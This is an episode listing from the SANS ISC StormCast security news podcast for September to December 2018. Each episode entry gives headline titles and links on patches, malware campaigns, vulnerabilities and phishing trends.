Yet Another DOSfuscation Sample https://isc.sans.edu/forums/diary/Yet+Another+DOSfuscation+Sample/24408/ OpenSSH Backdoors https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf Android Malware Bypasses 2FA For Paypal https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/
12/13/2018, 4 minutes, 55 seconds

ISC StormCast for Wednesday, December 12th 2018

Microsoft December 2018 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+December+2018+Patch+Tuesday/24404/ Adobe Patch Tuesday https://helpx.adobe.com/security/products/acrobat/apsb18-41.html Certificate Authority Weaknesses https://i.blackhat.com/eu-18/Thu-Dec-6/eu-18-Heftrig-Off-Path-Attacks-Against-PKI.pdf
12/12/2018, 5 minutes, 31 seconds

ISC StormCast for Tuesday, December 11th 2018

Kubernetes Unauthenticated PoC Exploit for CVE-2018-1002105 https://github.com/evict/poc_CVE-2018-1002105#unauthenticated-poc WebAssembly Brings Buffer Overflows to Browsers https://www.forcepoint.com/blog/security-labs/new-whitepaper-memory-safety-old-vulnerabilities-become-new-webassembly Increased Ethereum Miner Attacks https://isc.sans.edu/port.html?port=8545 https://www.zdnet.com/article/hackers-ramp-up-attacks-on-mining-rigs-before-ethereum-price-crashes-into-the-gutter Android Click Fraud Apps are Emulating iPhones for Higher Revenue https://www.bleepingcomputer.com/news/security/android-clickfraud-op-impersonates-iphones-to-bump-ad-premiums/
12/11/2018, 5 minutes, 45 seconds

ISC StormCast for Monday, December 10th 2018

Analyzing Malicious Docker Images https://isc.sans.edu/forums/diary/A+Dive+into+malicious+Docker+Containers/24388/ Arrest of Huawei CFO Inspires Advance Fee Scam https://isc.sans.edu/forums/diary/Arrest+of+Huawei+CFO+Inspires+Advance+Fee+Scam/24396/ Sextortion Messages Leading to Ransomware https://www.proofpoint.com/us/threat-insight/post/sextortion-side-ransomware WebKit Exploit Released https://github.com/LinusHenze/WebKit-RegEx-Exploit Implants Found in Russian Banks https://securelist.com/darkvishnya/89169/
12/10/2018, 5 minutes, 45 seconds

ISC StormCast for Friday, December 7th 2018

Adobe Vulnerability PoC Released https://isc.sans.edu/forums/diary/Is+it+Time+to+Uninstall+Flash+If+you+havent+already/24382/ WatchOS Update https://support.apple.com/en-us/HT209343 Data Exfiltration During Pentests https://isc.sans.edu/forums/diary/Data+Exfiltration+in+Penetration+Tests/24354/ PoC Exploit for Kubernetes Vulnerability https://github.com/evict/poc_CVE-2018-1002105 Preston Ackerman: Marketing 2FA https://www.sans.org/reading-room/whitepapers/authentication/swipe-tap-marketing-easier-2fa-increase-adoption-38695
12/7/2018, 21 minutes, 33 seconds

ISC StormCast for Thursday, December 6th 2018

Adobe Releases Emergency Flash Patch https://helpx.adobe.com/security/products/flash-player/apsb18-42.html Apple Updates Everything (but not WatchOS) https://support.apple.com/en-us/HT201222 New Privacy Issues Affecting 3G-5G protocols https://eprint.iacr.org/2018/1175
12/6/2018, 5 minutes, 6 seconds

ISC StormCast for Wednesday, December 5th 2018

Fake Ransomware Decryption Service https://www.theregister.co.uk/2018/12/04/ransomware_helper_was_middleman_dr_shifro/ Latest Lokibot Malspam https://isc.sans.edu/forums/diary/Malspam+pushing+Lokibot+malware/24372/ Chrome 71 Released https://www.bleepingcomputer.com/news/google/chrome-71-released-with-abusive-ad-filtering-and-audio-blocking/ RSA Followup Webcast https://www.rsaconference.com/videos/virtual-session-the-5-most-dangerous-new-attack-techniques-and-whats-to-come
12/5/2018, 6 minutes, 25 seconds

ISC StormCast for Tuesday, December 4th 2018

Word Maldoc: Yet Another Place to Hide a Command https://isc.sans.edu/forums/diary/Word+maldoc+yet+another+place+to+hide+a+command/24370/ US-CERT Releases SamSam Alert https://www.us-cert.gov/ncas/alerts/AA18-337A Kubernetes Patches https://groups.google.com/forum/#!topic/kubernetes-announce/GVllWCg6L88 Malicious iOS App Tricks Users into Payment https://www.welivesecurity.com/2018/12/03/scam-ios-apps-promise-fitness-steal-money-instead/
12/4/2018, 4 minutes, 54 seconds

ISC StormCast for Monday, December 3rd 2018

KingMiner Improved Cryptomining https://research.checkpoint.com/kingminer-the-new-and-improved-cryptojacker/ Siglent Technologies Oscilloscope Vulnerabilities https://seclists.org/fulldisclosure/2018/Nov/68 AutoCAD Malware https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft ISC Stickers (login required; first 10 requests each day) https://isc.sans.edu/sticker.html
12/3/2018, 6 minutes, 46 seconds

ISC StormCast for Friday, November 30th 2018

Russian Language Malspam Pushing Shade (Troldesh) Ransomware https://isc.sans.edu/forums/diary/Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24358/ Scamclub Malvertising Against iOS Users https://blog.confiant.com/malvertising-attack-hijacks-300-million-sessions-over-48-hours-9d0218fe02cd Andre Shori: To Block Or Not To Block? Impact and Analysis of Actively Blocking Shodan Scans http://www.sans.org/reading-room/whitepapers/networksecurity/block-block-impact-analysis-actively-blocking-shodan-scans-38645
11/30/2018, 13 minutes, 59 seconds

ISC StormCast for Thursday, November 29th 2018

Obfuscated Shell Scripts: Fake MacOS Flash Updates https://isc.sans.edu/forums/diary/More+obfuscated+shell+scripts+Fake+MacOS+Flash+update/24352/ Sennheiser HeadSetup Certificate Authority Install https://www.secorvo.de/publikationen/headsetup-vulnerability-report-secorvo-2018.pdf Microsoft Fixes Shared Folder Permission Deletion Problem https://support.microsoft.com/en-us/help/4467684/windows-10-update-kb4467684 3ve Botnet Dismantled https://services.google.com/fh/files/blogs/3ve_google_whiteops_whitepaper_final_nov_2018.pdf
11/29/2018, 6 minutes, 19 seconds

ISC StormCast for Wednesday, November 28th 2018

Obfuscated QNAP bash Malware https://isc.sans.edu/forums/diary/Obfuscated+bash+script+targeting+QNap+boxes/24348/ Half of All Phishing Sites Use HTTPS https://krebsonsecurity.com/2018/11/half-of-all-phishing-sites-now-have-the-padlock/ Chrome and Firefox to Remove FTP Support https://www.bleepingcomputer.com/news/google/chrome-and-firefox-developers-aim-to-remove-support-for-ftp/ California Wildfire Used in BEC Scams https://www.agari.com/identity-intelligence-blog/california-wildfire-email-scams/
11/28/2018, 5 minutes, 24 seconds

ISC StormCast for Tuesday, November 27th 2018

ViperMonkey: VBA Maldoc Deobfuscation https://isc.sans.edu/forums/diary/ViperMonkey+VBA+maldoc+deobfuscation/24346/ Malicious NPM Libraries https://medium.com/@cnorthwood/todays-javascript-trash-fire-and-pile-on-f3efcf8ac8c7 Turning Your BMC Into A Revolving Door https://www.synacktiv.com/ressources/zeronights_2018_turning_your_bmc_into_a_revolving_door.pdf
11/27/2018, 6 minutes, 7 seconds

ISC StormCast for Monday, November 26th 2018

Attacks Against Docker API https://isc.sans.edu/forums/diary/Moby+the+Shark/24340/ Mirai-Like Attack Hitting Hadoop https://asert.arbornetworks.com/mirai-not-just-for-iot-anymore/ New Rowhammer Variant Affects ECC Memory https://www.vusec.net/projects/eccploit/
11/26/2018, 5 minutes, 53 seconds

ISC StormCast for Wednesday, November 21st 2018

Critical Flash Update https://helpx.adobe.com/security/products/flash-player/apsb18-44.html Thanksgiving Lure for Emotet https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet
11/21/2018, 3 minutes, 12 seconds

ISC StormCast for Tuesday, November 20th 2018

Google Play Malware https://twitter.com/LukasStefanko ATM Vulnerabilities https://www.ptsecurity.com/upload/corporate/ww-en/analytics/ATM-Vulnerabilities-2018-eng.pdf Nagios XI Update https://www.tenable.com/security/research/tra-2018-37
11/20/2018, 4 minutes, 43 seconds

ISC StormCast for Monday, November 19th 2018

Multipurpose PCAP Analysis Tool https://isc.sans.edu/forums/diary/Multipurpose+PCAP+Analysis+Tool/24322/ Quickly Investigating Websites with Lookyloo https://isc.sans.edu/forums/diary/Quickly+Investigating+Websites+with+Lookyloo/24320/ From Field Spoofing in GMail https://blog.cotten.io/hacking-gmail-with-weird-from-fields-d6494254722f?gi=ce61de4cb006
11/18/2018, 5 minutes, 29 seconds

ISC StormCast for Friday, November 16th 2018

Emotet Spreading IcedID Banking Malware https://isc.sans.edu/forums/diary/Emotet+infection+with+IcedID+banking+Trojan/24312/ Crypto Miners Abusing Insecure Docker Installs https://forums.juniper.net/t5/Threat-Research/Container-Malware-Miners-Go-Docker-Hunting-In-The-Cloud/ba-p/400587 GPS Watches Can Be Used To Track Kids https://www.pentestpartners.com/security-blog/tracking-and-snooping-on-a-million-kids/ Firefox Will Notify Users of Breached Sites https://blog.mozilla.org/blog/2018/11/14/firefox-monitor-launches-in-26-languages-and-adds-new-desktop-browser-feature/ David Kennel: All-Seeing Eye or Blind Man? Understanding the Linux Kernel Auditing System https://www.sans.org/reading-room/whitepapers/linux/all-seeing-eye-blind-man-understanding-linux-kernel-auditing-system-38605
11/16/2018, 14 minutes, 59 seconds

ISC StormCast for Thursday, November 15th 2018

Details about Zero Day Exploit Taking Advantage of Win32k Vuln. https://securelist.com/a-new-exploit-for-zero-day-vulnerability-cve-2018-8589/88845/ PacSec Pwn2Own Results https://www.zerodayinitiative.com/blog/2018/11/13/pwn2own-tokyo-2018-day-one-results https://www.zerodayinitiative.com/blog/2018/11/14/pwn2own-tokyo-2018-day-two-results-and-master-of-pwn More Spectre/Meltdown Flaws https://arxiv.org/pdf/1811.05441.pdf
11/15/2018, 5 minutes, 48 seconds

ISC StormCast for Wednesday, November 14th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2018+Microsoft+Patch+Tuesday/24308/ Adobe Security Bulletins https://helpx.adobe.com/security.html
11/14/2018, 5 minutes, 6 seconds

ISC StormCast for Tuesday, November 13th 2018

Google BGP Hijack via Russia https://twitter.com/thousandeyes/status/1062102171506765825 https://www.wsj.com/articles/google-internet-traffic-is-briefly-misdirected-through-russia-china-1542068392 Microcode Bootloader USB https://www.techpowerup.com/forums/threads/intel-microcode-boot-loader.248858/ Wordpress GDPR Tool Vulnerable https://www.wordfence.com/blog/2018/11/trends-following-vulnerability-in-wp-gdpr-compliance-plugin/
11/13/2018, 5 minutes, 17 seconds

ISC StormCast for Monday, November 12th 2018

Cloudflare Releases Mobile Apps To Use 1.1.1.1 https://blog.cloudflare.com/1-thing-you-can-do-to-make-your-internet-safer-and-faster/ Crypto Coin Miners Now With Rootkits https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth Google Play Protect Reduces Malware https://security.googleblog.com/2018/11/introducing-android-ecosystem-security.html
11/12/2018, 6 minutes, 28 seconds

ISC StormCast for Friday, November 9th 2018

Cisco Security Bulletins https://tools.cisco.com/security/center/publicationListing.x Ruby Deserialization https://www.elttam.com.au/blog/ruby-deserialization/ Ouch Newsletter: Am I Hacked? https://www.sans.org/security-awareness-training/resources/am-i-hacked Jonathan Sweeny: Smart Contract Botnets https://www.sans.org/reading-room/whitepapers/covert/botnet-resiliency-private-blockchains-38050 https://www.sans.org/reading-room/whitepapers/warfare/tearing-smart-contract-botnets-38650
11/9/2018, 17 minutes, 10 seconds

ISC StormCast for Thursday, November 8th 2018

VirtualBox 0 Day Guest Escape Exploit Released https://github.com/MorteNoir1/virtualbox_e1000_0day WooCommerce / Wordpress Bug Leads to RCE https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/ Bing Advertises Fake Version of Notepad2 https://www.bleepingcomputer.com/news/security/beware-of-unofficial-sites-pushing-notepad2-adware-bundles/ Jacksonville BSides https://bsidesjax.org
11/8/2018, 6 minutes, 41 seconds

ISC StormCast for Wednesday, November 7th 2018

China Telecom's Internet Traffic Misdirection https://internetintel.oracle.com/blog-single.html?id=China+Telecom%27s+Internet+Traffic+Misdirection Android Security Updates; Last for Nexus https://source.android.com/security/bulletin/2018-11-01#framework PoC Facetime Exploit https://bugs.chromium.org/p/project-zero/issues/detail?id=1641 Vulnerability in U-Boot Bootloader https://github.com/inversepath/usbarmory/blob/master/software/secure_boot/Security_Advisory-Ref_IPVR2018-0001.txt
11/7/2018, 5 minutes, 50 seconds

ISC StormCast for Tuesday, November 6th 2018

Struts 2.3 Uses Outdated commons-fileupload Library https://isc.sans.edu/forums/diary/Struts+23+Vulnerable+to+Two+Year+old+File+Upload+Flaw/24278/
Fake Elon Musk Tweet Used to Steal Bitcoin https://www.bleepingcomputer.com/news/security/fake-elon-musk-twitter-bitcoin-scam-earned-180k-in-one-day/
Bypassing SSD Drive Hardware Encryption https://www.ru.nl/english/news-agenda/news/vm/icis/cyber-security/2018/radboud-university-researchers-discover-security/
11/6/2018 (5 minutes, 48 seconds)

ISC StormCast for Monday, November 5th 2018

Beyond good ol' LaunchAgents https://isc.sans.edu/forums/diary/Beyond+good+ol+LaunchAgent+part+1/24274/
Dissecting a CVE-2017-11882 Exploit https://isc.sans.edu/forums/diary/Dissecting+a+CVE201711882+Exploit/24272/
Microsoft Edge Exploit About to Be Released https://twitter.com/Yux1xi
Portsmash Vulnerability https://github.com/bbbrumley/portsmash
RC4 (Arcfour) Deprecation in SSH https://tools.ietf.org/html/draft-ietf-curdle-rc4-die-die-die-12
11/5/2018 (5 minutes, 18 seconds)

ISC StormCast for Friday, November 2nd 2018

Windows Defender Sandboxing Bug https://isc.sans.edu/forums/diary/Windows+Defenders+Sandbox/24266/
Bleedingbit Bluetooth Low Energy Vulnerability https://armis.com/bleedingbit/
Cisco ASA/Firepower DoS Vulnerability Actively Exploited https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dos
11/1/2018 (5 minutes, 29 seconds)

ISC StormCast for Thursday, November 1st 2018

Encrypted Word Maldocs https://isc.sans.edu/forums/diary/More+malspam+using+passwordprotected+Word+docs/24262/
iOS / macOS ICMP Error Remote Code Execution https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
iOS Lock Screen Bypass https://www.youtube.com/watch?v=ojigFgwrtKs
11/1/2018 (5 minutes, 19 seconds)

ISC StormCast for Wednesday, October 31st 2018

Change in Strategy for Hancitor Malware https://isc.sans.edu/forums/diary/Campaign+evolution+Hancitor+malspam+starts+pushing+Ursnif+this+week/24256/
Apple Updates https://support.apple.com/en-us/HT201222
Telegram Stores Conversations Locally https://twitter.com/nathanielrsuchy
10/31/2018 (4 minutes, 36 seconds)

ISC StormCast for Tuesday, October 30th 2018

Maldoc Duplicating PowerShell https://isc.sans.edu/forums/diary/Maldoc+Duplicating+PowerShell+Prior+to+Use/24254/
New File Types Emerge in Malware Spam Attachments https://blog.trendmicro.com/trendlabs-security-intelligence/same-old-yet-brand-new-new-file-types-emerge-in-malware-spam-attachments/
Malicious Mac Cryptocurrency Tracker Installs Backdoor https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/
Sandbox for Windows Defender https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/
10/30/2018 (6 minutes, 3 seconds)

ISC StormCast for Monday, October 29th 2018

Dissecting Malicious Office Documents in Linux https://isc.sans.edu/forums/diary/Dissecting+Malicious+Office+Documents+with+Linux/24248/
Analyzing Compressed RTF Documents https://isc.sans.edu/forums/diary/Detecting+Compressed+RTF/24250/
systemd DHCPv6 Remote Code Execution Vulnerability https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-15688
Cryptominers Scan for Docker Engine https://blog.trendmicro.com/trendlabs-security-intelligence/misconfigured-container-abused-to-deliver-cryptocurrency-mining-malware
DemonBot Targeting Hadoop https://blog.radware.com/security/2018/10/new-demonbot-discovered/
10/29/2018 (4 minutes, 55 seconds)

ISC StormCast for Friday, October 26th 2018

Scam Calls Targeting Chinese Living in the US https://isc.sans.edu/forums/diary/Fake+BankPost+Office+Phone+Calls+Targeting+Chinese+Immigrants/24244/
X.org Privilege Elevation Flaw https://lists.x.org/archives/xorg-announce/2018-October/002927.html
Remote Videos in Office Documents https://blog.cymulate.com/abusing-microsoft-office-online-video
Mac Malware Injects Ads https://blog.malwarebytes.com/threat-analysis/2018/10/mac-malware-intercepts-encrypted-web-traffic-for-ad-injection/
10/26/2018 (5 minutes, 13 seconds)

ISC StormCast for Thursday, October 25th 2018

Reversing AutoIT https://isc.sans.edu/forums/diary/Diving+into+Malicious+AutoIT+Code/24238/
Arcserve Vulnerabilities https://www.digitaldefense.com/blog/zero-day-alerts/arcserve-disclosure/
WebExec Vulnerability https://webexec.org/
More ALPC Flaws from Sandbox Escaper https://twitter.com/SandboxEscaper/status/1054744201244692485 https://twitter.com/mkolsek/status/1054794984908562432
10/25/2018 (5 minutes, 24 seconds)

ISC StormCast for Wednesday, October 24th 2018

Malware Uses Decoy Picture https://isc.sans.edu/forums/diary/Malicious+Powershell+using+a+Decoy+Picture/24234/
DNS over HTTPS Pushback https://twitter.com/paulvixie/status/1053765281917661184
Signal Desktop Leaves Encryption Key Exposed https://twitter.com/nathanielrsuchy
Firefox 63 Allows Less Tracking https://blog.mozilla.org/security/2018/10/23/firefox-63-lets-users-block-tracking-cookies/
10/24/2018 (5 minutes, 56 seconds)

ISC StormCast for Tuesday, October 23rd 2018

MSG Files: Compressed RTF https://isc.sans.edu/forums/diary/MSG+Files+Compressed+RTF/24228/
FreeRTOS TCP/IP Stack Vulnerabilities https://blog.zimperium.com/freertos-tcpip-stack-vulnerabilities-put-wide-range-devices-risk-compromise-smart-homes-critical-infrastructure-systems/
VLC/Live555 RTSP Server Vulnerability https://www.talosintelligence.com/reports/TALOS-2018-0684
Microsoft Yammer Update https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8569#ID0EGB
10/23/2018 (5 minutes, 18 seconds)

ISC StormCast for Monday, October 22nd 2018

macOS LaunchAgent https://isc.sans.edu/forums/diary/Beyond+good+ol+LaunchAgent+part+0/24230/
TLS Session Tracking https://arxiv.org/pdf/1810.07304.pdf
jQuery File Upload Plugin https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html
Drupal Update https://www.drupal.org/sa-core-2018-006
10/22/2018 (5 minutes, 2 seconds)

ISC StormCast for Friday, October 19th 2018

Cisco Patches https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&firstPublishedStartDate=2018%2F10%2F17&firstPublishedEndDate=2018%2F10%2F17&lastPublishedStartDate=2018%2F10%2F17&lastPublishedEndDate=2018%2F10%2F17
51% Attack Against Cryptocurrencies https://old.reddit.com/r/CryptoCurrency/comments/9m1uuj/if_i_livestreamed_the_setup_and_execution_of/
VMware Patch https://www.vmware.com/au/security/advisories/VMSA-2018-0026.html
10/19/2018 (4 minutes, 27 seconds)

ISC StormCast for Thursday, October 18th 2018

Abandoned "NewShareCount" Twitter Counter Abused https://blog.sucuri.net/2018/10/malicious-redirects-from-newsharecounts-com-tweet-counter.html
Multiple D-Link Vulnerabilities https://seclists.org/fulldisclosure/2018/Oct/36
RID Hacking in Windows https://www.romhack.io/slides/RomHack%202018%20-%20Sebastian%20Castro%20-%20Windows%20RID%20Hijacking:%20Maintaining%20Access%20on%20Windows%20Machines.pdf
10/18/2018 (5 minutes, 22 seconds)

ISC StormCast for Wednesday, October 17th 2018

Oracle Critical Patch Update (CPU) https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
libssh Vulnerability https://www.libssh.org/security/advisories/CVE-2018-10933.txt
Vending Machine Mobile App Compromise https://hackernoon.com/how-i-hacked-modern-vending-machines-43f4ae8decec
Browsers Announce Timeline to Discontinue TLS 1.0/1.1 Support https://blogs.windows.com/msedgedev/2018/10/15/modernizing-tls-edge-ie11/ https://security.googleblog.com/2018/10/modernizing-transport-security.html https://blog.mozilla.org/security/2018/10/15/removing-old-versions-of-tls/ https://webkit.org/blog/8462/deprecation-of-legacy-tls-1-0-and-1-1-versions/
10/17/2018 (5 minutes, 42 seconds)

ISC StormCast for Tuesday, October 16th 2018

Proof of Concept Exploit for Microsoft Edge Vulnerability CVE-2018-8495 https://leucosite.com/Microsoft-Edge-RCE/
Fake Mining Apps https://www.fortinet.com/blog/threat-research/fortinet-discovers-new-android-apps-that-mine-the-unminable.html
Fake Google Photo App Turns Out to Be Ad-Clicker https://www.geeklatest.com/developer-tricks-microsoft-publishes-app-under-google-llc-name-in-windows-store/
10/16/2018 (5 minutes, 34 seconds)

ISC StormCast for Monday, October 15th 2018

Many Large Websites Affected by Branch.io XSS Flaw https://www.vpnmentor.com/blog/dom-xss-bug-affecting-tinder-shopify-yelp/
Medtronic Pacemakers Disable Remote Update https://www.medtronic.com/content/dam/medtronic-com/us-en/corporate/documents/REV-Medtronic-2090-Security-Bulletin_FNL.pdf
IBM Releases WebSphere Update https://www-01.ibm.com/support/docview.wss?uid=swg22016254
Incomplete JET Database Patch https://blog.0patch.com/2018/10/patching-re-patching-and-meta-patching.html
10/15/2018 (6 minutes, 17 seconds)

ISC StormCast for Friday, October 12th 2018

New Campaign Using Old Equation Editor Vulnerability https://isc.sans.edu/forums/diary/New+Campaign+Using+Old+Equation+Editor+Vulnerability/24196/
Root Access Vulnerability in Sony Smart TVs https://www.fortinet.com/blog/threat-research/sony-smart-tv-exploit-inside-view-hijacking-your-living-room.html
MikroTik RouterOS Vulnerabilities https://github.com/tenable/routeros/blob/master/bug_hunting_in_routeros_derbycon_2018.pdf
Reverse Analysis of WebAssembly https://www.forcepoint.com/blog/security-labs/manual-reverse-engineering-webassembly-static-code-analysis
Firefox Delays Symantec Certificate Distrust https://www.theregister.co.uk/2018/10/11/firefox_symantec_certs_delay/
10/11/2018 (5 minutes, 51 seconds)

ISC StormCast for Thursday, October 11th 2018

Remote Code Execution Vulnerability in WhatsApp https://bugs.chromium.org/p/project-zero/issues/detail?id=1654
Salesforce Releases HASSH Library https://github.com/salesforce/hassh
CVE-2018-8453 Details from Kaspersky https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/
Juniper Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES
Experian Vulnerability Could Have Leaked Credit Freeze PINs https://www.nerdwallet.com/blog/finance/security-flaw-at-experian-allows-easy-access-to-pin-to-unlock-credit-freeze/
10/11/2018 (6 minutes, 24 seconds)

ISC StormCast for Wednesday, October 10th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/October+2018+Microsoft+Patch+Tuesday/24186/
Adobe Updates https://helpx.adobe.com/security.html
Magecart Infects "Shopper Approved" Plugin https://www.riskiq.com/blog/labs/magecart-shopper-approved/
10/10/2018 (5 minutes, 31 seconds)

ISC StormCast for Tuesday, October 9th 2018

Apple Updates iOS and iCloud for Windows https://support.apple.com/en-ca/HT209162 https://support.apple.com/en-ca/HT209141
Intel Adds Spectre/Meltdown Mitigation to 9th Generation CPUs https://www.bleepingcomputer.com/news/security/spectre-and-meltdown-hardware-protection-added-to-intels-9th-gen-cpus/
Windows October Update File Deletion Issues https://support.microsoft.com/en-us/help/4464619/windows-10-update-history https://blogs.technet.microsoft.com/filecab/2018/08/30/9205/
macOS Code Signing Vulnerabilities https://www.virusbulletin.com/conference/vb2018/abstracts/code-signing-flaw-macos
10/9/2018 (4 minutes, 44 seconds)

ISC StormCast for Monday, October 8th 2018

WPA2 KRACK Attack Update https://www.krackattacks.com/followup.html#overview
Cisco Updates https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities
Seattle Police Try to Stop Swatting https://www.seattle.gov/police/need-help/swatting
git Vulnerability Fixed https://github.com/timwr/CVE-2017-1000117
10/8/2018 (6 minutes, 53 seconds)

ISC StormCast for Friday, October 5th 2018

Does the Chinese Military Manipulate Supermicro Motherboards? https://www.bloomberg.com/news/articles/2018-10-04/the-big-hack-amazon-apple-supermicro-and-beijing-respond
Cloudflare IPFS Gateway Used for Phishing https://www.bleepingcomputer.com/news/security/phishing-attacks-distributed-through-cloudflares-ipfs-gateway/
DNSSEC Root Key Signing Key Rollover https://www.icann.org/resources/pages/ksk-rollover https://www.icann.org/news/blog/2018-ksk-rollover-operator-preparedness-survey
10/5/2018 (7 minutes, 18 seconds)

ISC StormCast for Thursday, October 4th 2018

Identifying a Phisher https://isc.sans.edu/forums/diary/Identifying+a+phisher/24164/
Phishing via Azure Blob Storage https://www.netskope.com/blog/phishing-in-the-public-cloud
Zoho Domains Used for Phishing and Keyloggers https://cofense.com/staggering-amount-stolen-data-heading-zoho-domains/
Dell iDRAC Exploit https://www.servethehome.com/idracula-vulnerability-impacts-millions-of-legacy-dell-emc-servers/
10/4/2018 (6 minutes)

ISC StormCast for Wednesday, October 3rd 2018

How to Write YARA Rules https://isc.sans.edu/forums/diary/Developing+YARA+Rules+a+Practical+Example/24158/
GhostDNS DNS Changer Malware https://blog.netlab.360.com/70-different-types-of-home-routers-all-together-100000-are-being-hijacked-by-ghostdns-en/
Foxit PDF Reader Vulnerabilities https://www.foxitsoftware.com/support/security-bulletins.php
Apple Laptops Shipped With CPU in Manufacturing Mode http://blog.ptsecurity.com/2018/10/intel-me-manufacturing-mode-macbook.html
10/3/2018 (5 minutes, 11 seconds)

ISC StormCast for Tuesday, October 2nd 2018

Update About Facebook Breach https://newsroom.fb.com/news/2018/09/security-update/
Adobe Acrobat/Reader Update https://helpx.adobe.com/security/products/acrobat/apsb18-30.html
SMTP MTA Strict Transport Security (MTA-STS) https://www.rfc-editor.org/rfc/rfc8461.txt
10/2/2018 (6 minutes, 10 seconds)

ISC StormCast for Monday, October 1st 2018

Facebook Leaks More Than 50 Million Accounts https://newsroom.fb.com/news/2018/09/security-update/
Telegram Leaks Local IP Address by Default https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html
Site Tricks Users Into Subscribing to Browser Notifications https://www.bleepingcomputer.com/news/security/sites-trick-users-into-subscribing-to-browser-notification-spam/
DDE Code Injection https://isc.sans.edu/forums/diary/More+Excel+DDE+Code+Injection/24150/
10/1/2018 (6 minutes, 11 seconds)

ISC StormCast for Friday, September 28th 2018

Enriching Radare2 and x64dbg Malware Analysis with Statically Decoded Strings https://isc.sans.edu/forums/diary/Enriching+Radare2+and+x64dbg+malware+analysis+with+statically+decoded+strings/24146/
Weaknesses in Apple's Mobile Device Management https://duo.com/labs/research/mdm-me-maybe
LoJax UEFI Rootkit https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/
9/28/2018 (5 minutes, 34 seconds)

ISC StormCast for Thursday, September 27th 2018

Emotet Malware Delivery Service Update https://isc.sans.edu/forums/diary/One+Emotet+infection+leads+to+three+followup+malware+infections/24140/
Fedora Crypto Policy Update Causes SSH Issues https://bugzilla.redhat.com/show_bug.cgi?id=1631970
Android Banking Trojan Impersonates QRecorder https://lukasstefanko.com/2018/09/banking-trojan-found-on-google-play-stole-10000-euros-from-victims.html
Google Reverts Changes to Chrome https://www.blog.google/products/chrome/product-updates-based-your-feedback/amp/
9/27/2018 (5 minutes, 2 seconds)
Episode Artwork

ISC StormCast for Wednesday, September 26th 2018

Firefox Haveibeenpwned Monitor https://blog.mozilla.org/blog/2018/09/25/introducing-firefox-monitor-helping-people-take-control-after-a-data-breach/ Chrome 69 Privacy Issues https://www.bleepingcomputer.com/news/google/chrome-69-keeps-googles-cookies-after-you-clear-browser-data/ Cisco FragmentSmack Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180824-linux-ip-fragment Microsoft Bitlocker Turns Itself Off During Updates https://social.technet.microsoft.com/Forums/en-US/0e48536f-40ff-4046-bd08-ed4a39b4840f/bitlocker-automatically-suspending-during-updates?forum=win10itprosecurity
9/26/2018, 5 minutes, 4 seconds

ISC StormCast for Tuesday, September 25th 2018

More Sextortion Emails https://isc.sans.edu/forums/diary/Sextortion+Spam+and+the+Infinite+Monkey+Theorem/24136/ MacOS 10.14 (Mojave) Security Fixes https://support.apple.com/en-us/HT209139 Mojave Privacy Protection Bypass https://vimeo.com/291491984 Cloudflare Supporting Encrypted SNI https://blog.cloudflare.com/esni/
9/25/2018, 5 minutes, 56 seconds

ISC StormCast for Monday, September 24th 2018

Odd DNS Requests from Firewalls https://isc.sans.edu/forums/diary/Suspicious+DNS+Requests+Issued+by+a+Firewall/24128/ Securing API Connections https://isc.sans.edu/forums/diary/The+danger+of+sending+information+for+API+consumption+without+adequate+security+measures/24130/ Microsoft JET Database 0day https://www.zerodayinitiative.com/advisories/ZDI-18-1075/ Western Digital Releases Patch for MyCloud Drives https://support.wdc.com/knowledgebase/answer.aspx?ID=25952&s Job Offers With Malware Attachment https://www.bleepingcomputer.com/news/security/malware-disguised-as-job-offers-distributed-on-freelance-sites/
9/24/2018, 4 minutes, 30 seconds

ISC StormCast for Friday, September 21st 2018

Hunting for Suspicious Processes with OSSEC https://isc.sans.edu/forums/diary/Hunting+for+Suspicious+Processes+with+OSSEC/24122/ NSSLabs Sues Crowdstrike, Symantec, ESET https://www.nsslabs.com/blog/company/advancing-transparency-and-accountability-in-the-cybersecurity-industry/ Bitcoin Core Vulnerability https://motherboard.vice.com/amp/en_us/article/qvakp3/a-major-bug-in-bitcoin-software-could-have-crashed-the-currency?__twitter_impression=true WebAuthn Standard https://paragonie.com/blog/2018/08/security-concerns-surrounding-webauthn-don-t-implement-ecdaa-yet https://fidoalliance.org/
9/21/2018, 12 minutes, 33 seconds

ISC StormCast for Thursday, September 20th 2018

Adobe Releases Special Patch for Acrobat and Reader https://helpx.adobe.com/security/products/acrobat/apsb18-34.html Akamai State of the Internet Report https://www.akamai.com/us/en/about/our-thinking/state-of-the-internet-report/global-state-of-the-internet-security-ddos-attack-reports.jsp Peekaboo DVR Vulnerability https://www.tenable.com/blog/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder
9/20/2018, 5 minutes, 24 seconds

